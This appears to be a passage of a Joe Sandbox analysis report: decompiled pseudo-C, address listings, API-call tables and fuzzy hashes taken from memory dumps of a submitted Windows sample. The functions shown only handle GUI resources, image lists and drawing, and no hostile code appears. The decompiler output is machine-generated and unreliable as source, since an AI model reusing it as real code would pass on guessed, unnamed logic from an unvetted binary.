                                                                                                                                                                                                                                                                                          0x000fab10
                                                                                                                                                                                                                                                                                          0x000fab16
                                                                                                                                                                                                                                                                                          0x000fab1c
                                                                                                                                                                                                                                                                                          0x000fab22
                                                                                                                                                                                                                                                                                          0x000fab32
                                                                                                                                                                                                                                                                                          0x000fab39
                                                                                                                                                                                                                                                                                          0x000fab4d
                                                                                                                                                                                                                                                                                          0x000fab53
                                                                                                                                                                                                                                                                                          0x000fab59
                                                                                                                                                                                                                                                                                          0x000fab5f
                                                                                                                                                                                                                                                                                          0x000fab61
                                                                                                                                                                                                                                                                                          0x000fab64
                                                                                                                                                                                                                                                                                          0x000fab6d
                                                                                                                                                                                                                                                                                          0x000fab90
                                                                                                                                                                                                                                                                                          0x000fab9d
                                                                                                                                                                                                                                                                                          0x000faba3
                                                                                                                                                                                                                                                                                          0x000faba6
                                                                                                                                                                                                                                                                                          0x000fabaf
                                                                                                                                                                                                                                                                                          0x000fabaf
                                                                                                                                                                                                                                                                                          0x000fabcb
                                                                                                                                                                                                                                                                                          0x000fabd7
                                                                                                                                                                                                                                                                                          0x000fabd7
                                                                                                                                                                                                                                                                                          0x000fabe7
                                                                                                                                                                                                                                                                                          0x000fab6f
                                                                                                                                                                                                                                                                                          0x000fab6f
                                                                                                                                                                                                                                                                                          0x000fab6f
                                                                                                                                                                                                                                                                                          0x000fabee
                                                                                                                                                                                                                                                                                          0x000fabf5
                                                                                                                                                                                                                                                                                          0x000fabf6
                                                                                                                                                                                                                                                                                          0x000fabfc
                                                                                                                                                                                                                                                                                          0x000fac17
                                                                                                                                                                                                                                                                                          0x000fac1d
                                                                                                                                                                                                                                                                                          0x000fac23
                                                                                                                                                                                                                                                                                          0x000fac2d
                                                                                                                                                                                                                                                                                          0x000fac3b
                                                                                                                                                                                                                                                                                          0x000fac41
                                                                                                                                                                                                                                                                                          0x000fac4d
                                                                                                                                                                                                                                                                                          0x000fac55
                                                                                                                                                                                                                                                                                          0x000fac55
                                                                                                                                                                                                                                                                                          0x000fac5a
                                                                                                                                                                                                                                                                                          0x000fac5a
                                                                                                                                                                                                                                                                                          0x000fac5f
                                                                                                                                                                                                                                                                                          0x000fac67
                                                                                                                                                                                                                                                                                          0x000fac68
                                                                                                                                                                                                                                                                                          0x000fac69
                                                                                                                                                                                                                                                                                          0x000fac77

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 000FAACF
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 000FAAE7
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 000FAAEF
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000407,00000000,?), ref: 000FAB22
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FAB39
                                                                                                                                                                                                                                                                                          • LoadStringA.USER32 ref: 000FAB90
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 000FAB9D
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 000FABAF
                                                                                                                                                                                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 000FABCB
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000404,00000003,?), ref: 000FAC17
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 000FAC2D
                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 000FAC3B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$ObjectSelectlstrlen$ExtentLoadPoint32ReleaseStringText_memset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1950834119-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 09dbddf024d8ca059c1d3f057b47c2f935aa80f999d87f8b7ff1c20223c1a918
                                                                                                                                                                                                                                                                                          • Instruction ID: e422eb4d74192d153baec585d96d61a3eacc80bfa5122519003b3eb857971d9c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09dbddf024d8ca059c1d3f057b47c2f935aa80f999d87f8b7ff1c20223c1a918
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD612AB1A05219DFDB24CF64DD88BAABBB9FF89300F108599E50D97291DB709E80CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                          			E000FDA60(void* __edi, CHAR* _a4) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				short* _v28;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t42;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t46;
                                                                                                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                                                                                          				int _t57;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                                                                          				short* _t76;
                                                                                                                                                                                                                                                                                          				signed int _t89;
                                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t98;
                                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                                          				signed int _t108;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t96 = __edi;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F678);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t42 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t42 ^ _t108);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t98 =  *0x170c0c;
                                                                                                                                                                                                                                                                                          				_t46 = FindResourceA(_t98, _a4, 0xf1);
                                                                                                                                                                                                                                                                                          				if(_t46 == 0) {
                                                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t48 = LoadResource(_t98, _t46);
                                                                                                                                                                                                                                                                                          					if(_t48 == 0) {
                                                                                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t73 = LockResource(_t48);
                                                                                                                                                                                                                                                                                          						if(_t73 == 0) {
                                                                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t89 =  *(_t73 + 6) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							_t5 = _t73 + 8; // 0x8
                                                                                                                                                                                                                                                                                          							_v28 = _t5;
                                                                                                                                                                                                                                                                                          							_v24 = _t89;
                                                                                                                                                                                                                                                                                          							E000FDA00( *(_t73 + 4) & 0x0000ffff,  *(_t73 + 2) & 0x0000ffff, __edi);
                                                                                                                                                                                                                                                                                          							if( *((intOrPtr*)(__edi + 0x48)) != 0) {
                                                                                                                                                                                                                                                                                          								L5:
                                                                                                                                                                                                                                                                                          								_v8 = 0;
                                                                                                                                                                                                                                                                                          								if(( *(_t96 + 0x85) & 0x00000020) == 0) {
                                                                                                                                                                                                                                                                                          									_t53 = LoadBitmapA( *0x170c0c, _a4);
                                                                                                                                                                                                                                                                                          									_v20 = _t53;
                                                                                                                                                                                                                                                                                          									_t101 = _t53;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t101 = LoadImageA( *0x170c0c, _a4, 0, 0, 0, 0x2040);
                                                                                                                                                                                                                                                                                          									_v20 = _t101;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_t101 == 0) {
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if(ImageList_AddMasked( *(_t96 + 0x48), _t101,  *(_t96 + 0xa0)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                          										_t55 = _v24;
                                                                                                                                                                                                                                                                                          										if(_t55 > 0) {
                                                                                                                                                                                                                                                                                          											_t76 = _v28;
                                                                                                                                                                                                                                                                                          											_v24 = _t55;
                                                                                                                                                                                                                                                                                          											do {
                                                                                                                                                                                                                                                                                          												if( *_t76 != 0) {
                                                                                                                                                                                                                                                                                          													E000FA220(_t76, _t96 + 0x4c);
                                                                                                                                                                                                                                                                                          													_t101 = _v20;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												_t76 = _t76 + 2;
                                                                                                                                                                                                                                                                                          												_t35 =  &_v24;
                                                                                                                                                                                                                                                                                          												 *_t35 = _v24 - 1;
                                                                                                                                                                                                                                                                                          											} while ( *_t35 != 0);
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t57 = ImageList_GetImageCount( *(_t96 + 0x48));
                                                                                                                                                                                                                                                                                          										_push(_t101);
                                                                                                                                                                                                                                                                                          										if(_t57 ==  *((intOrPtr*)(_t96 + 0x50))) {
                                                                                                                                                                                                                                                                                          											DeleteObject();
                                                                                                                                                                                                                                                                                          											 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          											return 1;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											DeleteObject();
                                                                                                                                                                                                                                                                                          											 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          											return 0;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										E000FA480( &_v20);
                                                                                                                                                                                                                                                                                          										goto L11;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t66 =  *0x170c0c;
                                                                                                                                                                                                                                                                                          								 *(__edi + 0x85) =  *(__edi + 0x85) ^ ((_t89 & 0xffffff00 |  *((short*)(LockResource(LoadResource(_t66, FindResourceA(_t66, _a4, 2))) + 0xe)) == 0x00000020) << 0x00000005 ^  *(__edi + 0x85)) & 0x00000020;
                                                                                                                                                                                                                                                                                          								if(E00101660( *(_t73 + 6) & 0x0000ffff, __edi) == 0) {
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L5;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x000fda60
                                                                                                                                                                                                                                                                                          0x000fda63
                                                                                                                                                                                                                                                                                          0x000fda65
                                                                                                                                                                                                                                                                                          0x000fda70
                                                                                                                                                                                                                                                                                          0x000fda76
                                                                                                                                                                                                                                                                                          0x000fda7d
                                                                                                                                                                                                                                                                                          0x000fda81
                                                                                                                                                                                                                                                                                          0x000fda8a
                                                                                                                                                                                                                                                                                          0x000fda97
                                                                                                                                                                                                                                                                                          0x000fda9f
                                                                                                                                                                                                                                                                                          0x000fdb9f
                                                                                                                                                                                                                                                                                          0x000fdba4
                                                                                                                                                                                                                                                                                          0x000fdbb1
                                                                                                                                                                                                                                                                                          0x000fdaa5
                                                                                                                                                                                                                                                                                          0x000fdaa7
                                                                                                                                                                                                                                                                                          0x000fdaaf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdab5
                                                                                                                                                                                                                                                                                          0x000fdabc
                                                                                                                                                                                                                                                                                          0x000fdac0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdac6
                                                                                                                                                                                                                                                                                          0x000fdac6
                                                                                                                                                                                                                                                                                          0x000fdace
                                                                                                                                                                                                                                                                                          0x000fdad1
                                                                                                                                                                                                                                                                                          0x000fdada
                                                                                                                                                                                                                                                                                          0x000fdadd
                                                                                                                                                                                                                                                                                          0x000fdae6
                                                                                                                                                                                                                                                                                          0x000fdb34
                                                                                                                                                                                                                                                                                          0x000fdb34
                                                                                                                                                                                                                                                                                          0x000fdb42
                                                                                                                                                                                                                                                                                          0x000fdb71
                                                                                                                                                                                                                                                                                          0x000fdb77
                                                                                                                                                                                                                                                                                          0x000fdb7a
                                                                                                                                                                                                                                                                                          0x000fdb44
                                                                                                                                                                                                                                                                                          0x000fdb60
                                                                                                                                                                                                                                                                                          0x000fdb62
                                                                                                                                                                                                                                                                                          0x000fdb62
                                                                                                                                                                                                                                                                                          0x000fdb7e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdb80
                                                                                                                                                                                                                                                                                          0x000fdb95
                                                                                                                                                                                                                                                                                          0x000fdbb4
                                                                                                                                                                                                                                                                                          0x000fdbb9
                                                                                                                                                                                                                                                                                          0x000fdbbb
                                                                                                                                                                                                                                                                                          0x000fdbbe
                                                                                                                                                                                                                                                                                          0x000fdbc1
                                                                                                                                                                                                                                                                                          0x000fdbc5
                                                                                                                                                                                                                                                                                          0x000fdbca
                                                                                                                                                                                                                                                                                          0x000fdbcf
                                                                                                                                                                                                                                                                                          0x000fdbcf
                                                                                                                                                                                                                                                                                          0x000fdbd2
                                                                                                                                                                                                                                                                                          0x000fdbd5
                                                                                                                                                                                                                                                                                          0x000fdbd5
                                                                                                                                                                                                                                                                                          0x000fdbd5
                                                                                                                                                                                                                                                                                          0x000fdbc1
                                                                                                                                                                                                                                                                                          0x000fdbde
                                                                                                                                                                                                                                                                                          0x000fdbe4
                                                                                                                                                                                                                                                                                          0x000fdbe8
                                                                                                                                                                                                                                                                                          0x000fdc05
                                                                                                                                                                                                                                                                                          0x000fdc13
                                                                                                                                                                                                                                                                                          0x000fdc20
                                                                                                                                                                                                                                                                                          0x000fdbea
                                                                                                                                                                                                                                                                                          0x000fdbea
                                                                                                                                                                                                                                                                                          0x000fdbf5
                                                                                                                                                                                                                                                                                          0x000fdc02
                                                                                                                                                                                                                                                                                          0x000fdc02
                                                                                                                                                                                                                                                                                          0x000fdb97
                                                                                                                                                                                                                                                                                          0x000fdb9a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdb9a
                                                                                                                                                                                                                                                                                          0x000fdb95
                                                                                                                                                                                                                                                                                          0x000fdae8
                                                                                                                                                                                                                                                                                          0x000fdaeb
                                                                                                                                                                                                                                                                                          0x000fdb21
                                                                                                                                                                                                                                                                                          0x000fdb32
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fdb32
                                                                                                                                                                                                                                                                                          0x000fdae6
                                                                                                                                                                                                                                                                                          0x000fdac0
                                                                                                                                                                                                                                                                                          0x000fdaaf

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • FindResourceA.KERNEL32(000F0000,000F7D7D,000000F1), ref: 000FDA97
                                                                                                                                                                                                                                                                                          • LoadResource.KERNEL32(000F0000,00000000,?,00000000,?,000F7D7D,00000080), ref: 000FDAA7
                                                                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,00000000,?,000F7D7D,00000080), ref: 000FDAB6
                                                                                                                                                                                                                                                                                          • FindResourceA.KERNEL32(000F0000,000F7D7D,00000002), ref: 000FDAF6
                                                                                                                                                                                                                                                                                          • LoadResource.KERNEL32(000F0000,00000000,?,00000000,?,000F7D7D,00000080), ref: 000FDAFE
                                                                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,00000000,?,000F7D7D,00000080), ref: 000FDB05
                                                                                                                                                                                                                                                                                            • Part of subcall function 00101660: ImageList_Create.COMCTL32(?,?,00000000,?,00000001,?,?,?,?,?,?,?,?,000FDB30,?,00000000), ref: 0010168B
                                                                                                                                                                                                                                                                                          • LoadImageA.USER32 ref: 000FDB5A
                                                                                                                                                                                                                                                                                          • LoadBitmapA.USER32 ref: 000FDB71
                                                                                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,000F7D7D), ref: 000FDB8C
                                                                                                                                                                                                                                                                                          • ImageList_GetImageCount.COMCTL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,000F7D7D), ref: 000FDBDE
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 000FDBEA
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 000FDC05
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FDA00: ImageList_GetImageCount.COMCTL32(?,?,00000000,000FDAE2,?,00000000,?,000F7D7D,00000080), ref: 000FDA0E
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FDA00: ImageList_Destroy.COMCTL32(?,?,00000000,?,000F7D7D,00000080), ref: 000FDA1C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Image$Resource$List_$Load$CountDeleteFindLockObject$BitmapCreateDestroyMasked
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3830000767-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 804b26563dff75b449e6ea6b19a8d40239b6b62ad9673de7c4421f6336f9fc6c
                                                                                                                                                                                                                                                                                          • Instruction ID: 20e4f591b4b079d7d3583660708625ecaa7cc64641c368b8c0977766099ace72
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 804b26563dff75b449e6ea6b19a8d40239b6b62ad9673de7c4421f6336f9fc6c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2151E371A00219EFDB15CF64DC89BBAB7B9FB08310F008256FA05E7A80DB74AC80D790
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                                                                                                          			E001016A0(void* __ecx, RECT* __edx, struct HDC__* _a4) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v40;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v56;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                                                                                                          				long _t44;
                                                                                                                                                                                                                                                                                          				intOrPtr _t45;
                                                                                                                                                                                                                                                                                          				int _t56;
                                                                                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          				RECT* _t77;
                                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F255);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t35 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t36 = _t35 ^ _t87;
                                                                                                                                                                                                                                                                                          				_v24 = _t36;
                                                                                                                                                                                                                                                                                          				_push(_t36);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t81 = __ecx;
                                                                                                                                                                                                                                                                                          				_t77 = __edx;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v56.left = 0;
                                                                                                                                                                                                                                                                                          				_v56.top = 0;
                                                                                                                                                                                                                                                                                          				_v56.right = 0;
                                                                                                                                                                                                                                                                                          				_v56.bottom = 0;
                                                                                                                                                                                                                                                                                          				GetClientRect( *(__ecx + 4),  &_v56);
                                                                                                                                                                                                                                                                                          				_v40.top = _v56.top;
                                                                                                                                                                                                                                                                                          				_v40.left = _v56.left;
                                                                                                                                                                                                                                                                                          				_v40.right = _v56.right;
                                                                                                                                                                                                                                                                                          				_v40.bottom = _v56.bottom;
                                                                                                                                                                                                                                                                                          				InflateRect( &_v40, 0xfffffff6, 0xfffffff6);
                                                                                                                                                                                                                                                                                          				_t44 = _v40.left;
                                                                                                                                                                                                                                                                                          				if(_t44 > _v40.right) {
                                                                                                                                                                                                                                                                                          					_v40.right = _t44;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t45 = _v40.top;
                                                                                                                                                                                                                                                                                          				if(_t45 > _v40.bottom) {
                                                                                                                                                                                                                                                                                          					_v40.bottom = _t45;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E000F6860(_t77,  &_v40, _t81 + 0x24);
                                                                                                                                                                                                                                                                                          				_t59 = CreateRectRgnIndirect(_t77);
                                                                                                                                                                                                                                                                                          				_t85 = CreateRectRgnIndirect( &_v56);
                                                                                                                                                                                                                                                                                          				CombineRgn(_t85, _t85, _t59, 4);
                                                                                                                                                                                                                                                                                          				SelectClipRgn(_a4, _t85);
                                                                                                                                                                                                                                                                                          				FillRect(_a4,  &_v56, 0x11);
                                                                                                                                                                                                                                                                                          				_t75 = _a4;
                                                                                                                                                                                                                                                                                          				SelectClipRgn(_a4, 0);
                                                                                                                                                                                                                                                                                          				_t56 = FillRect(_a4, _t77, GetStockObject(0));
                                                                                                                                                                                                                                                                                          				if(_t85 != 0) {
                                                                                                                                                                                                                                                                                          					_t56 = DeleteObject(_t85);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_t59 != 0) {
                                                                                                                                                                                                                                                                                          					_t56 = DeleteObject(_t59);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t79);
                                                                                                                                                                                                                                                                                          				_pop(_t86);
                                                                                                                                                                                                                                                                                          				_pop(_t60);
                                                                                                                                                                                                                                                                                          				return E001059E6(_t56, _t60, _v24 ^ _t87, _t75, _t79, _t86);
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x001016a3
                                                                                                                                                                                                                                                                                          0x001016a5
                                                                                                                                                                                                                                                                                          0x001016b0
                                                                                                                                                                                                                                                                                          0x001016b4
                                                                                                                                                                                                                                                                                          0x001016b9
                                                                                                                                                                                                                                                                                          0x001016bb
                                                                                                                                                                                                                                                                                          0x001016c1
                                                                                                                                                                                                                                                                                          0x001016c5
                                                                                                                                                                                                                                                                                          0x001016cb
                                                                                                                                                                                                                                                                                          0x001016cd
                                                                                                                                                                                                                                                                                          0x001016d1
                                                                                                                                                                                                                                                                                          0x001016d7
                                                                                                                                                                                                                                                                                          0x001016da
                                                                                                                                                                                                                                                                                          0x001016dd
                                                                                                                                                                                                                                                                                          0x001016e0
                                                                                                                                                                                                                                                                                          0x001016e8
                                                                                                                                                                                                                                                                                          0x001016f9
                                                                                                                                                                                                                                                                                          0x001016fc
                                                                                                                                                                                                                                                                                          0x00101708
                                                                                                                                                                                                                                                                                          0x0010170b
                                                                                                                                                                                                                                                                                          0x0010170e
                                                                                                                                                                                                                                                                                          0x00101714
                                                                                                                                                                                                                                                                                          0x0010171a
                                                                                                                                                                                                                                                                                          0x0010171c
                                                                                                                                                                                                                                                                                          0x0010171c
                                                                                                                                                                                                                                                                                          0x0010171f
                                                                                                                                                                                                                                                                                          0x00101725
                                                                                                                                                                                                                                                                                          0x00101727
                                                                                                                                                                                                                                                                                          0x00101727
                                                                                                                                                                                                                                                                                          0x00101733
                                                                                                                                                                                                                                                                                          0x00101745
                                                                                                                                                                                                                                                                                          0x0010174b
                                                                                                                                                                                                                                                                                          0x00101750
                                                                                                                                                                                                                                                                                          0x0010175b
                                                                                                                                                                                                                                                                                          0x0010176b
                                                                                                                                                                                                                                                                                          0x00101771
                                                                                                                                                                                                                                                                                          0x00101777
                                                                                                                                                                                                                                                                                          0x0010178b
                                                                                                                                                                                                                                                                                          0x00101799
                                                                                                                                                                                                                                                                                          0x0010179c
                                                                                                                                                                                                                                                                                          0x0010179c
                                                                                                                                                                                                                                                                                          0x001017a0
                                                                                                                                                                                                                                                                                          0x001017a3
                                                                                                                                                                                                                                                                                          0x001017a3
                                                                                                                                                                                                                                                                                          0x001017a8
                                                                                                                                                                                                                                                                                          0x001017b0
                                                                                                                                                                                                                                                                                          0x001017b1
                                                                                                                                                                                                                                                                                          0x001017b2
                                                                                                                                                                                                                                                                                          0x001017c0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 001016E8
                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000F6,000000F6), ref: 0010170E
                                                                                                                                                                                                                                                                                          • CreateRectRgnIndirect.GDI32(?), ref: 0010173F
                                                                                                                                                                                                                                                                                          • CreateRectRgnIndirect.GDI32(?), ref: 00101747
                                                                                                                                                                                                                                                                                          • CombineRgn.GDI32(00000000,00000000,00000000,00000004), ref: 00101750
                                                                                                                                                                                                                                                                                          • SelectClipRgn.GDI32(?,00000000), ref: 0010175B
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 0010176B
                                                                                                                                                                                                                                                                                          • SelectClipRgn.GDI32(?,00000000), ref: 00101777
                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000000), ref: 0010177F
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 0010178B
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0010179C
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001017A3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
